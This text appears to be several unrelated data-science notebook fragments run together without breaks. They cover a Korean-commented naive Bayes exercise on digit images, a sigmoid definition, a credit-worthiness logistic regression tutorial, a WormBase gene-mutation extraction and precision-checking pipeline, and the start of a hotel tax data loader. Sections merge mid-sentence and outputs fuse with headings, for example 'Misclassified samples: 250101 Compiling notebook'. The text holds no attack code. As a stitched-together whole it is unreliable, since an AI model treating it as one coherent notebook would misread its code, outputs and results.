0.5근처로 밀어버림 # 정상 메일인지 스팸메일인지 알아보기 x_new=np.array([1,1,0,0]) model_bern.predict_proba([x_new]) # 정상메일일 가능성이 약 3배임을 알 수 있다. from sklearn.datasets import load_digits digits=load_digits() x=digits.data y=digits.target x[0,:] digits.images[0,:,:] from sklearn.preprocessing import Binarizer # 위 이미지 데이터를 Binarizer적용 x2=Binarizer(7).fit_transform(x) # 7보다 크면 1로 바꿔줌 x2[0,:] plt.imshow(digits.images[0,:,:],cmap=plt.cm.binary) plt.axis("off") # 이 이미지에 대해 베르누이 나이브베이즈 모형을 적용하자. 분류 결과를 분류보고서 형식으로 나타내라. model_bern = BernoulliNB().fit(x, y) y_pred=model_bern.predict(x) print(classification_report(y,y_pred)) # BernoulliNB 클래스의 binarize인수를 사용하여 위를 풀어보기 x=digits.data y=digits.target model_bern = BernoulliNB(binarize=7).fit(x, y) y_pred=model_bern.predict(x) print(classification_report(y,y_pred)) # 왜 값이 다르지.. theta=np.exp(model_bern.feature_log_prob_) theta theta=theta.reshape(10,8,8) plt.imshow(theta[0,:,:],cmap=plt.cm.binary) plt.axis("off") # 이게 0의 평균적인 이미지A sigmoid function it is a mathematical function having a characteristic "S"-shaped curve or sigmoid curve.a sigmoid function is the logistic function. ![](https://wikimedia.org/api/rest_v1/media/math/render/svg/f6f69aad495c133ff951475da3d2ac0de3a0f571) A sigmoid function is a bounded, differentiable, real function that is defined for all real input values and has a non-negative derivative at each pointand exactly one inflection point.A sigmoid "function" and a sigmoid "curve" refer to the same object.PropertiesIn general, a sigmoid function is monotonic, and has a first derivative which is bell shaped.Conversely, the integral of any continuous, non-negative,bell-shaped function (with one local maximum and no local minimum, unless degenerate) will be sigmoidal. Thus the cumulative distribution functions for many common probability distributions are sigmoidal. One such example is the error function, which is related to the cumulative distribution function of a normal distribution.def sigmoid(x): return 1 / (1+ np.exp(-x))IntroductionCreditworthiness is the parameter that decides whether a person or company will be considered to be worthy or deserving to be given financial credit for certain period of time based on their previous repayment history.Financial institutions uses credit score for evaluating and quantifying to decide that an applicant is worthy to be given credit.The worth obtained using creditworthiness is used to decide the interest rates on credit and credit limit (the amount to be sanctioned) for the existing borrower. ObjectiveThe objective here is to build a model to 1. To take credit decisions based on individual characteristics2. To give an early warning to potential credit defauls Importing important librariesHere we are going to import the import libraries used for my project. The basic libraries are Pandas, Numpy, Sklearn, Mathplotlib etc. Initially, we have a notion of deciding whether a borrower is worthy or not. So, we can say that here we are going to address classification problem. So, I also imported Logistic regression model from Scikit learn. Logistic regression is a model which is used when our output class is binary (discrete). Logistic regression is used to model the probability of each class.Also, we need to evaluate the performance of our model, so I have imported metric from Scikit learn.import pandas as pd import numpy as np import warnings warnings.filterwarnings("ignore") from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler import matplotlib.pyplot as plt # Importing library for logistic regression from sklearn.linear_model import LogisticRegression # Importing performance metrics - accuracy score & confusion matrix from sklearn.metrics import accuracy_score,confusion_matrix, f1_scoreThe Seaborn is a Python library for data visualization based on matplotlib. So, it is good to use it here.import seaborn as snsGetting familiar with dataImporting the data and doing preliminiary analysisdf = pd.read_excel('CreditWorthiness.xlsx',sheet_name='Data') df.info() RangeIndex: 1000 entries, 0 to 999 Data columns (total 21 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Cbal 1000 non-null object 1 Cdur 1000 non-null int64 2 Chist 1000 non-null object 3 Cpur 1000 non-null object 4 Camt 1000 non-null int64 5 Sbal 1000 non-null object 6 Edur 1000 non-null object 7 InRate 1000 non-null int64 8 MSG 1000 non-null object 9 Oparties 1000 non-null object 10 Rdur 1000 non-null object 11 Prop 1000 non-null object 12 age 1000 non-null int64 13 inPlans 1000 non-null object 14 Htype 1000 non-null object 15 NumCred 1000 non-null int64 16 JobType 1000 non-null object 17 Ndepend 1000 non-null int64 18 telephone 1000 non-null object 19 foreign 1000 non-null [...]It looks like the data has no NAN values. Therefore, there is no need for NAN value removal and data imputation. The target variable seems to be credit score. The data has six numerical and 15 categorical variables. Looking top ten entries to see whether the data has any special charactersThe variable description is given below![image.png](attachment:image.png) The glipmse of data is given below containing five top rowsdf.head()The glimse of data containing the last five rows of datasetdf.tail()The heatmap given below will give the relation of Credit score with numerical variablesplt.figure(figsize=(15,10)) #plot heat map g=sns.heatmap(df.corr(),annot=True,vmin=0.1,vmax=0.5,cmap="YlGnBu") g.set_xticklabels(g.get_xticklabels(), rotation=90, horizontalalignment='right') g.set_yticklabels(g.get_yticklabels(), rotation=0, horizontalalignment='right')The five number summary of numerical variables of dataset is given belowdf.describe()The statistical summary of categorical variables of dataset is given belowdf.describe(include='object')Let us see how many bad or good credit score are theredf.groupby('creditScore').size()There are 300 people with bad credit score and 700 people with good credit score. Hard encoding bad as zero and good as one.plt.figure(figsize=(5,5)) sns.boxplot(df["creditScore"],df["age"],palette="gist_rainbow")This graphs shows that older people have good credit score If the installment rate is lower thanplt.figure(figsize=(5,5)) sns.boxplot(df["creditScore"],df["Cdur"],palette="gist_rainbow")The borrowers with higher duration of credit has bad credit scoreplt.figure(figsize=(5,5)) sns.boxplot(df["creditScore"],df["Camt"],palette="gist_rainbow")The borrower with larger amount of credit have bad credit scoredf['creditScore']=df['creditScore'].map({'bad':0, 'good':1})Encoding categorical variables into dummy variablesX = pd.get_dummies(df) df_columns_list=list(X.columns) # Separating the input names from species features=list(set(df_columns_list)-set(['creditScore']))Separating dependent and independent varriables# Storing the output values in y target=list(['creditScore']) y=X[target].values Xf=X[features] Xf.info() x = X[features].valuesThe data is split into train and test data and standardization to have zero mean and unit variance# Splitting the data into train and test train_x, test_x, train_y, test_y = train_test_split( x, y, test_size=0.25, random_state=0) # Data scaling scaler = StandardScaler() # Fit on training set only. scaler.fit(train_x) # Apply transform to both the training set and the test set. train_x = scaler.transform(train_x) test_x = scaler.transform(test_x)I prefer logistic regression model to classify the output as good or badThe logistic regression model is built and output are predicted using the built model# Make an instance of the Model logistic = LogisticRegression(penalty='l1', tol=0.01, solver='saga') # Fitting the values for x and y logistic.fit(train_x/np.std(train_x,0),train_y) print(logistic.coef_) # Prediction from test data prediction = logistic.predict(test_x)The evaluation metric used are confusion matrixThe accuracy is obtained and shown# Confusion matrix confusion_matrix = confusion_matrix(prediction,test_y) print(confusion_matrix) # Calculating the accuracy accuracy_score=accuracy_score(prediction,test_y) print(accuracy_score)[[ 40 20] [ 37 153]] 0.772It become really tough to say that the model is very good as the accuracy is 77.2%# Calculating the f1_score f1_score=f1_score(prediction,test_y) print(f1_score)0.8429752066115701But, if we look the $F_1$ score then we can say that our basic model is really good[](http://)# Printing the misclassified values from prediction print('Misclassified samples: %d' % (test_y != prediction).sum())Misclassified samples: 250101 Compiling notebook 2 outputsimport pandas as pd import math from pathlib import Path import numpy as np import re import glob import configparser import json from utils.misc.regex_block import MutationFinder, TmVar, CustomWBregex, normalize_mutations # incase you've ran the prev notebook on splits of papers data = [] for file in glob.glob("data/model_output/*.csv"): print(file) # 'WBPaper ID', 'Method', '* Genes', '* Gene-Variant combo', 'Mutation', 'Sentence' text = pd.read_csv(file).to_numpy().tolist() data = data + text data = np.array(data) # above cell takes a while to complete, so saving the data temporarily data = pd.DataFrame(data[:], columns=['WBPaper ID', 'Method', '*Genes', '*Gene-Variant combo ', 'Mutations', 'Sentence']) data.to_csv("data/model_output/processed/snippets_1.csv", index=False, encoding='utf-8') data = None2 Normalizing mutations to one-letter amino acid codes These code imports would be doing the same thing done in notebook 2, but on a much small subset of data.data = pd.read_csv("data/model_output/processed/snippets_1.csv") data = data.to_numpy() # 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Sentence' db_config = configparser.ConfigParser() db_config.read('utils/all_config.cfg') custom_mut_extract = CustomWBregex(db_config, locus_only=True) mf_mut_extract = MutationFinder('data/regexs/mutationfinder_regex/seth_modified.txt') tmvar_mut_extract = TmVar('data/regexs/tmvar_regex/final_regex_path') def point_mut_block(sentence, span_size=150): mut_and_snippets = [] # MutationFinder mut_and_snippets = mut_and_snippets + mf_mut_extract(sentence, span_size=span_size) # tmVar mut_and_snippets = mut_and_snippets + tmvar_mut_extract(sentence, span_size=span_size) # Custom patterns mut_and_snippets = mut_and_snippets + custom_mut_extract(sentence, span_size=span_size) if mut_and_snippets: mut_and_snippets = np.array(mut_and_snippets) mut_and_snippets = mut_and_snippets[:, 0].tolist() mut_and_snippets = list(set(mut_and_snippets)) return mut_and_snippets point_mut_block('ad465 , nucleotide 2862 of the coding region to 400 bp downstream G-to-A change at nucleotide 673 resulting in a stop codon from the stop site was amplified using primers ATGGATGAAC at amino acid 107; ad692 , T-to-G change at nucleotide 811 TATACAA') normalize_mutations('T-to-G change at nucleotide 811'), normalize_mutations('Phe230Leu'), \ normalize_mutations('C to T at nucleotide 4539'), normalize_mutations('methionine for lysine-856'), \ normalize_mutations('glycine-118 is replaced by an arginine'), normalize_mutations('1247 (valine to leucine') normalize_mutations('Phe230amber')Working with the protein mutations from regex block for now# old - 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Sentence' # new - 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' temp = [] total_count = len(data) ner_count = 0 regex_count = 0 paper_mut_count = {} print('Following mutations could NOT be normalized. Either a) normalize them manually and add in the csv file b) Make edits in the normalize_mutations fn') for i, row in enumerate(data): if row[1] != 'Regex': if row[1] == 'NER': ner_count += 1 temp.append(np.insert(data[i], -1, '').tolist()) else: paper_id = row[0] if paper_id not in paper_mut_count.keys(): paper_mut_count[paper_id] = {} regex_count += 1 norm_mutations = [] mutations = data[i, -2][1:-1].split("', '") for raw_mut in mutations: mut = point_mut_block(raw_mut) if mut: # helps filtering obvious ones for m in mut: m = m.replace(",", "") if m.find(')') != -1: if m.find('(') == -1: continue try: # takes care of filtering out bad mutations where # wild residues and mutants are same e.g G123G norm_mut = normalize_mutations(mut[0]) if norm_mut: if norm_mut not in paper_mut_count[paper_id].keys(): paper_mut_count[paper_id][norm_mut] = 0 paper_mut_count[paper_id][norm_mut] += 1 norm_mutations.append(norm_mut) except KeyError: print(m) if norm_mutations: norm_mutations = list(set(norm_mutations)) norm_mutations = "'" + "', '".join(norm_mutations) + "'" else: norm_mutations = '' temp.append(np.insert(data[i], -1, norm_mutations).tolist()) data = temp temp = None with open("data/model_output/processed/temp_paper_mut_count.json", "w") as outfile: json.dump(paper_mut_count, outfile) print('All', ner_count, 'NER data rows were ignored. Only', regex_count, 'regex data rows were used.') # saving things data = pd.DataFrame(data[:], columns=['WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence']) data.to_csv("data/model_output/processed/snippets_2.csv", index=False, encoding='utf-8')3 Normalizing common gene name to its WormBase IDAnd getting the gene and mutation frequency in a paper.data = pd.read_csv("data/model_output/processed/snippets_2.csv") data = data.to_numpy() # 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence'Inefficient way to do this. Have to work on better search algo.wb_genes_1 = Path('data/gsoc/Gene_alias.1.txt').read_text().split('\n') wb_genes_2 = Path('data/gsoc/Gene_alias.2.txt').read_text().split('\n') wb_genes_3 = Path('data/gsoc/Gene_alias.3.txt').read_text().split('\n') wb_genes_1 = [r.split('\t') for r in wb_genes_1] wb_genes_2 = [r.split(' ') for r in wb_genes_2] wb_genes_3 = [r.split(' ') for r in wb_genes_3] all_wb_genes = dict() for row in wb_genes_1+wb_genes_2+wb_genes_3: if row[0] not in all_wb_genes.keys(): all_wb_genes[row[0]] = [] for gene in row[1:]: if len(gene) and gene.lower() not in all_wb_genes[row[0]]: all_wb_genes[row[0]].append(gene.lower()) len(all_wb_genes) print('Total sentences: {}, processed count: '.format(len(data)), end=' ') updated_data = [] paper_wbgene_count = {} # 'WBPaper ID', 'Method', 'Genes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' for i, row in enumerate(data): if (i+1) % 100 == 0: print(f"{i+1}", end = " ") paper_id = row[0] genes = row[2] sentence = row[-1] # checking if nan if type(genes) == float: col_genes = '' else: if paper_id not in paper_wbgene_count.keys(): paper_wbgene_count[paper_id] = {} genes = genes[1:-1].split("', '") col_genes = [] for gene in genes: for key, value in all_wb_genes.items(): if gene.lower() in value: if key not in paper_wbgene_count[paper_id]: paper_wbgene_count[paper_id][key] = 0 paper_wbgene_count[paper_id][key] += 1 col_genes.append(key) break if col_genes: col_genes = list(set(col_genes)) col_genes = "'" + "', '".join(col_genes) + "'" else: col_genes = '' updated_data.append([data[i,0], data[i,1], data[i,2], col_genes, data[i,3], data[i,4], data[i,5], data[i,6]]) data = updated_data # 'WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Sentence' updated_data = None with open("data/model_output/processed/temp_paper_wbgene_count.json", "w") as outfile: json.dump(paper_wbgene_count, outfile)Checking if any detected gene was NOT in the WB gene dictionarydata = np.array(data) data[len(data[:,2]) != len(data[:,3])] # above cell takes a while to complete, so saving the data temporarily data = pd.DataFrame(data[:], columns=['WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence']) data.to_csv("data/model_output/processed/snippets_3.csv", index=False, encoding='utf-8') data = None5 ValidationFinding the gene and mutation matches using the transcripts in c_elegans.PRJNA13758.WS281.protein.fa Get the file here - ftp://ftp.ebi.ac.uk/pub/databases/wormbase/releases/WS281/species/c_elegans/PRJNA13758/c_elegans.PRJNA13758.WS281.protein.fa.gzwb_genes_1 = Path('data/gsoc/Gene_alias.1.txt').read_text().split('\n') wb_genes_2 = Path('data/gsoc/Gene_alias.2.txt').read_text().split('\n') wb_genes_3 = Path('data/gsoc/Gene_alias.3.txt').read_text().split('\n') wb_genes_1 = [r.split('\t') for r in wb_genes_1] wb_genes_2 = [r.split(' ') for r in wb_genes_2] wb_genes_3 = [r.split(' ') for r in wb_genes_3] all_wb_genes = dict() for row in wb_genes_1+wb_genes_2+wb_genes_3: if row[0] not in all_wb_genes.keys(): all_wb_genes[row[0]] = [] for gene in row[1:]: if len(gene) and gene.lower() not in all_wb_genes[row[0]]: all_wb_genes[row[0]].append(gene.lower()) len(all_wb_genes) data = pd.read_csv("data/model_output/processed/snippets_3.csv") data = data.to_numpy() # 'WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' proteinfa = Path('data/gsoc/proteinfa/c_elegans.PRJNA13758.WS281.protein.fa').read_text().split('>')[1:] wb_gene_and_prot = dict() # {wbgene: [transcript, protein]} for row in proteinfa: wbgene = re.findall("WBGene[0-9]+", row)[0] protein = "".join(re.findall("\n.*", row)).replace('\n','') transcript = row.split(' ')[0] if wbgene not in wb_gene_and_prot.keys(): wb_gene_and_prot[wbgene] = [] wb_gene_and_prot[wbgene].append([transcript, protein]) len(wb_gene_and_prot)Create a pair of gene and mutation only when BOTH are present in same sentence.paper_raw_info_compiled = [] # 'WBPaper ID', 'Method', 'Genes', 'WBGenes', '*Gene-Variant combo ', 'Mutations', 'Normalized Mutations', 'Sentence' for row in data: ppr_id = row[0] norm_muts = row[-2] wbgenes = row[3] sentence = row[-1] gene_var = row[4] # filtering out nan values if type(norm_muts) != float and type(wbgenes) != float: norm_muts = norm_muts[1:-1].split("', '") wbgenes = wbgenes[1:-1].split("', '") for m in norm_muts: for g in wbgenes: if len(m) and len(g): paper_raw_info_compiled.append([ppr_id, g, m, sentence, gene_var]) matches = [] final_sheet = [] # ppr_id, gene, transcript for info_from_ppr in paper_raw_info_compiled: ppr_id = info_from_ppr[0] gene = info_from_ppr[1] mut = info_from_ppr[2] sent = info_from_ppr[3] gene_var = info_from_ppr[4] if not len(mut): continue if gene not in wb_gene_and_prot.keys(): continue for row in wb_gene_and_prot[gene]: transcript, protein_string = row wt_res = mut[0] pos = int(''.join(n for n in mut if n.isdigit())) mut_res = mut[-1] try: if protein_string[pos-1] == wt_res: matches.append([ppr_id, gene, mut, gene_var, transcript, sent]) except IndexError: pass for r in matches: p = r[0] p, wbg, mut, gene_var, transcript, sent = r # Adding gene common names column, again # Current code doesn't keep any link between the WB gene name and the common name g_common_name = all_wb_genes[wbg] g_common_name = ', '.join(g_common_name) final_sheet.append([p, wbg, g_common_name, mut, gene_var, transcript, sent]) len(final_sheet)Getting metadata on genes and mutations, and adding warnings columnwith open("data/model_output/processed/temp_paper_wbgene_count.json", "r") as f: paper_wbgene_count = json.loads(f.read()) with open("data/model_output/processed/temp_paper_mut_count.json", "r") as f: paper_mut_count = json.loads(f.read()) final_sheet = np.array(final_sheet) updated_sheet = [] for i, row in enumerate(final_sheet): warnings = [] paper_id = row[0] wbgene = row[1] mut = row[3] sentence = row[-1] for ppr_mut, count in paper_mut_count[paper_id].items(): if mut == ppr_mut and count == 1: warnings.append(f'{mut} mentioned only once in entire paper') break rows_with_same_mut = final_sheet[np.logical_and(final_sheet[:, 0] == paper_id, final_sheet[:,3] == mut)] same_mut_all_genes = list(set(rows_with_same_mut[:, 1])) # If the same variant is found in two different genes in the same paper - WARN! # It is more likely to belong to the gene it is most frequently encountered if len(same_mut_all_genes) > 1: temp_warn_store = f'{mut} was paired with other genes too:' for ppr_gene, count in paper_wbgene_count[paper_id].items(): if ppr_gene in same_mut_all_genes: temp_warn_store += (f' {ppr_gene} (seen {count} times),') warnings.append(temp_warn_store) cut_mut = re.sub("([A-Z])([0-9]+)([A-Za-z]+)", r'\1\2', mut) remaining_mut = mut.replace(cut_mut, "") same_cut_muts = [i for i,m in enumerate(final_sheet[:,3]) if (m[:len(cut_mut)] == cut_mut and m[len(cut_mut):] != remaining_mut)] if same_cut_muts: temp_warn_store = f'{mut} similar to:' for temp_i in same_cut_muts: temp_warn_store += (f' {final_sheet[:,3][temp_i]} (line {temp_i}),') warnings.append(temp_warn_store) all_muts_in_sentence = data[np.logical_and(data[:, 0] == paper_id, data[:,-1] == sentence)][:,-2] all_muts_in_sentence = all_muts_in_sentence[0][1:-1].split("', '") all_matched_muts_in_sentence = final_sheet[np.logical_and(final_sheet[:, 0] == paper_id, final_sheet[:,-1] == sentence)][:,3] all_matched_muts_in_sentence = list(set(all_matched_muts_in_sentence)) unmatched_muts_in_sentence = [m for m in all_muts_in_sentence if m not in all_matched_muts_in_sentence] if len(unmatched_muts_in_sentence) >= 2: temp_warn_store = f'Sentence has multiple mutations which did not match:' for m in unmatched_muts_in_sentence: temp_warn_store += (f' {m},') warnings.append(temp_warn_store) all_genes_with_this_mut = final_sheet[np.logical_and(final_sheet[:, 0] == paper_id, final_sheet[:, 3] == mut)][:, 1] all_genes_with_this_mut = list(set(all_genes_with_this_mut)) if len(all_genes_with_this_mut) > 3: temp_warn_store = f'{mut} was matched with {len(all_genes_with_this_mut)} genes:' for g in all_genes_with_this_mut: temp_warn_store += (f' {g},') warnings.append(temp_warn_store) if warnings: warnings = " || ".join(warnings) else: warnings = "" updated_sheet.append(np.insert(row, -1, warnings).tolist()) # saving things updated_sheet = pd.DataFrame(updated_sheet[:], columns=['WBPaper ID', 'WBGene', 'Gene', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence']) updated_sheet.to_csv("data/model_output/processed/snippets_4.csv", index=False, encoding='utf-8') updated_sheet = None6 Additional details 6.1 Strainsdata = pd.read_csv("data/model_output/processed/snippets_4.csv").to_numpy() strains = Path('data/gsoc/Strains.txt').read_text().split('\n') strains = [r.split('\t') for r in strains][:-1] all_wb_strains = dict() for row in strains: if row[0] not in all_wb_strains.keys(): all_wb_strains[row[0]] = [] for strain in row[1:]: if len(strain) and strain.lower() not in all_wb_strains[row[0]]: all_wb_strains[row[0]].append(strain.lower()) strains = [s for row in strains for s in row[1:] if len(s) and not s.isdigit()] OPENING_CLOSING_REGEXES = [r'(?:^|[^0-9A-Za-z])(', r')(?:^|[^0-9A-Za-z])'] all_strain = OPENING_CLOSING_REGEXES[0] + '|'.join(strains) + OPENING_CLOSING_REGEXES[1] all_strain = [re.compile(r,re.IGNORECASE) for r in [all_strain]] # 'WBPaper ID', 'WBGene', 'Gene', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' updated_data = [] total = len(data) print('Total sentences: {}, processed count: '.format(total), end=' ') for i, sent in enumerate(data[:, -1]): if (i+1) % 100 == 0: print(f"{i+1}", end = " ") paper_strains = [] for regex in all_strain: for m in regex.finditer(sent): span = (m.start(0), m.end(0)) raw = (sent[span[0]:span[1]]).strip() raw = raw[1:] if not raw[0].isalnum() else raw raw = raw[:-1] if not raw[-1].isalnum() else raw if len(raw.strip()) > 1 and not raw.strip().isdigit(): paper_strains.append(raw.strip()) if paper_strains: paper_strains = list(set(paper_strains)) col_wbid = [] for strain in paper_strains: for key, value in all_wb_strains.items(): if strain.lower() in value: col_wbid.append(key) break paper_strains = "'" + "', '".join(paper_strains) + "'" if col_wbid: col_wbid = list(set(col_wbid)) col_wbid = ", ".join(col_wbid) else: col_wbid = '' # lazy way to deal with bad snippets due to special characters in the Strains.txt file # which are caught in regex paper_strains = '' else: paper_strains = '' col_wbid = '' updated_data.append([data[i,0], data[i,1], data[i,2], col_wbid, paper_strains, data[i,3], data[i,-4], data[i,-3], data[i,-2], data[i,-1]]) data = np.array(updated_data) # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' updated_data = NoneTotal sentences: 977, processed count: 100 200 300 400 500 600 700 800 9006.2 VariantsOPENING_CLOSING_REGEXES = [r'(?:^|[^0-9A-Za-z])(', r')(?:^|[^0-9A-Za-z])'] # the allele regex and db idea was stolen from wbtools allele_designations = np.load('data/gsoc/wbtools/wb_allele_designations.npy').astype('U6') alleles_variations = np.load('data/gsoc/wbtools/wb_alleles_variations.npy').astype('U6') DB_VAR_REGEX = r'({designations}|m|p|ts|gf|lf|d|sd|am|cs)([0-9]+)' var_regex_1 = OPENING_CLOSING_REGEXES[0] + DB_VAR_REGEX.format(designations="|".join(allele_designations)) + OPENING_CLOSING_REGEXES[1] all_var = OPENING_CLOSING_REGEXES[0] + '|'.join(alleles_variations) + '|' + var_regex_1 + OPENING_CLOSING_REGEXES[1] all_var = [re.compile(r,re.IGNORECASE) for r in [all_var]] # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Mutation', 'Transcript', 'Warnings', 'Sentence' updated_data = [] total = len(data) print('Total sentences: {}, processed count: '.format(total), end=' ') for i, sent in enumerate(data[:, -1]): if (i+1) % 100 == 0: print(f"{i+1}", end = " ") variants = [] for regex in all_var: for m in regex.finditer(sent): span = (m.start(0), m.end(0)) raw = (sent[span[0]:span[1]]).strip() raw = raw[1:] if not raw[0].isalnum() else raw raw = raw[:-1] if not raw[-1].isalnum() else raw if len(raw.strip()) > 1: variants.append(raw.strip()) if variants: variants = list(set(variants)) variants = "'" + "', '".join(variants) + "'" else: variants = '' updated_data.append([data[i,0], data[i,1], data[i,2], data[i,3], data[i,4], variants, data[i,-5], data[i,-4], data[i,-3], data[i,-2], data[i,-1]]) data = np.array(updated_data) # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Variants', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' updated_data = NoneTotal sentences: 977, processed count: 100 200 300 400 500 600 700 800 9006.3 Variation typeExtraction rate would be very low as most snippets from notebook 2 are discarded due to limitation in the mutation normalization block above.Variation_type = pd.read_csv("data/gsoc/Variation_type.csv").to_numpy() Variation_type = [t.replace("_", " ") for t in Variation_type[:,2] if type(t)!=float] updated_sheet = [] # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Variants', 'Mutation', 'Gene-Var combo', 'Transcript', 'Warnings', 'Sentence' for i, row in enumerate(data): sent = row[-1] col_var_type = [] for sub in Variation_type: if re.search(sub, sent, re.IGNORECASE): col_var_type.append(sub) if col_var_type: col_var_type = list(set(col_var_type)) col_var_type = ", ".join(col_var_type) else: col_var_type = '' updated_sheet.append(np.insert(row, -3, col_var_type).tolist()) data = np.array(updated_sheet) updated_sheet = None6.3 Functional effect & Generation method These type of data were in a few subset of papers tested during dev - expect these columns to be mostly empty.functional_effect = ['function uncertain', 'transcript function', 'translational product function', \ 'decreased transcript level', 'increased transcript level', 'decreased transcript stability', \ 'gain of function', 'dominant negative', 'dominant negativ', 'antimorphic', \ 'hypermorphic', 'neomorphic', 'conditional activity', 'hypomorphic', 'amorphic', \ 'repressible', 'misexpressed'] common_gen_methods = ['CRISPR', 'ENU', 'EMS'] updated_sheet = [] # 'WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', 'Variants', 'Mutation', 'Gene-Var combo', 'Variation type', 'Transcript', 'Warnings', 'Sentence' for i, row in enumerate(data): sent = row[-1] col_functional_effect = [] col_gen_method = [] for sub in functional_effect: if re.search(sub, sent, re.IGNORECASE): col_functional_effect.append(sub) for sub in common_gen_methods: if re.search(sub, sent): col_gen_method.append(sub) if col_functional_effect: col_functional_effect = list(set(col_functional_effect)) col_functional_effect = ", ".join(col_functional_effect) else: col_functional_effect = '' if col_gen_method: col_gen_method = list(set(col_gen_method)) col_gen_method = ", ".join(col_gen_method) else: col_gen_method = '' row = np.insert(row, -3, col_functional_effect) row = np.insert(row, -3, col_gen_method) updated_sheet.append(row.tolist()) data = np.array(updated_sheet) updated_sheet = None # saving things updated_sheet = pd.DataFrame(data[:], columns=['WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', \ 'Variants', 'Mutation', 'Gene-Var combo', 'Variation type', 'Functional effect', \ 'Generation method', 'Transcript', 'Warnings', 'Sentence']) updated_sheet.to_csv("data/model_output/processed/final.csv", index=False, encoding='utf-8') updated_sheet = None7 VerificationFinding precision by cross-checking with the manually curated data.data = pd.read_csv("data/model_output/processed/final.csv") data = data.to_numpy() paper_ids_processed = np.unique(data[:,0]) paper_ids_processed = np.sort(paper_ids_processed) temp = pd.read_csv("data/model_output/processed/snippets_1.csv") temp = temp.to_numpy() total_paper_ids_processed = np.unique(temp[:,0]) temp = None print('Total count of papers processed:', len(total_paper_ids_processed)) print('Count of papers:', len(paper_ids_processed))Total count of papers processed: 100 Count of papers: 537.1 Original ground truthground_truth = Path('data/gsoc/variantsDB.txt').read_text().split('\n') ground_truth = [r.split('\t') for r in ground_truth][:-1] ground_truth = np.array(ground_truth, dtype=object) # Checking if any processed paper is not in the ground truth file for id in total_paper_ids_processed: if id not in ground_truth[:,0]: print(id, end = ' ') if id in paper_ids_processed: print(' false positive') tp_col = [] for row in data: paper_id = row[0] gene = row[1] mutation = row[6] mutation = mutation.upper() transcript = row[-3] bool_found = False for label in ground_truth[ground_truth[:,0] == paper_id]: label[-2] = label[-2].upper() if transcript == label[-1] and mutation == label[-2]: bool_found = True # continue bc we're storing all the labels from a paper continue if bool_found: tp_col.append('True Positive') else: tp_col.append('False Positive') tp_col.count('True Positive'), tp_col.count('False Positive') print('Precision ',tp_col.count('True Positive')*100/(tp_col.count('True Positive') + tp_col.count('False Positive')), '%')Precision 48.31115660184238 %7.2 Curated ground truth Updated after manually looking at the "false positives" which aren't false positives and adding them in the ground truth file.ground_truth = Path('data/gsoc/variantsDB_curated.txt').read_text().split('\n') ground_truth = [r.split('\t') for r in ground_truth][:-1] ground_truth = np.array(ground_truth, dtype=object) # Checking if any processed paper is not in the ground truth file for id in total_paper_ids_processed: if id not in ground_truth[:,0]: print(id, end = ' ') if id in paper_ids_processed: print(' false positive') tp_col = [] for row in data: paper_id = row[0] gene = row[1] mutation = row[6] mutation = mutation.upper() transcript = row[-3] bool_found = False for label in ground_truth[ground_truth[:,0] == paper_id]: label[-2] = label[-2].upper() if transcript == label[-1] and mutation == label[-2]: bool_found = True # continue bc we're storing all the labels from a paper continue if bool_found: tp_col.append('True Positive') else: tp_col.append('False Positive') tp_col.count('True Positive'), tp_col.count('False Positive') print('Precision ',tp_col.count('True Positive')*100/(tp_col.count('True Positive') + tp_col.count('False Positive')), '%') tp_col = np.array(tp_col).T.reshape(-1, 1) final_sheet = np.hstack((data,tp_col)) # saving things final_sheet = pd.DataFrame(final_sheet[:], columns=['WBPaper ID', 'WBGene', 'Gene', 'WBStrain', 'Strains', \ 'Variants', 'Mutation', 'Gene-Var combo', 'Variation type', 'Functional effect', \ 'Generation method', 'Transcript', 'Warnings', 'Sentence', 'Result']) final_sheet.to_csv("data/model_output/processed/final_verified.csv", index=False, encoding='utf-8')Checking how many matches are present in the ground truth for the processed papersall_from_truth = [] for ppr in paper_ids_processed: for label in ground_truth[ground_truth[:,0] == ppr]: label[-2] = label[-2].upper() all_from_truth.append(label) len(all_from_truth)Grabing Public Hotel Occupancy Tax Data, then storing it into a database, crossreferencing if data is repeating Prerequisites: requirements for mysql-python communication:* pip install mysqlclient* pip install mysql-connector-python * if recieving wheel error: pip install wheel# Imports import time import sys from zipfile import ZipFile import pandas as pd import pandas.io.sql as pdsql import glob, os import numpy as np # Datetime for new column import datetime # Imports for mySQL from sqlalchemy import create_engine, event, DateTime from db_setup import mysql_user, mysql_password, db_name import mysql.connectorFile path definedmydir = os.path.abspath('./HotelOccupancyTaxData') mydirDefining headers for data# Defining header for marketing data. Marketing data comes with no header # Franchise tax permit ftact_date_head = ['Taxpayer_Number', 'Taxpayer_Name', 'Taxpayer_Address', 'Taxpayer_City', 'Taxpayer_State', 'Taxpayer_Zip_Code', 'Taxpayer_County_Code', 'Taxpayer_Organizational_Type', 'Taxpayer_Phone_Number', 'Record_Type_Code', 'Responsibility_Beginning_Date', 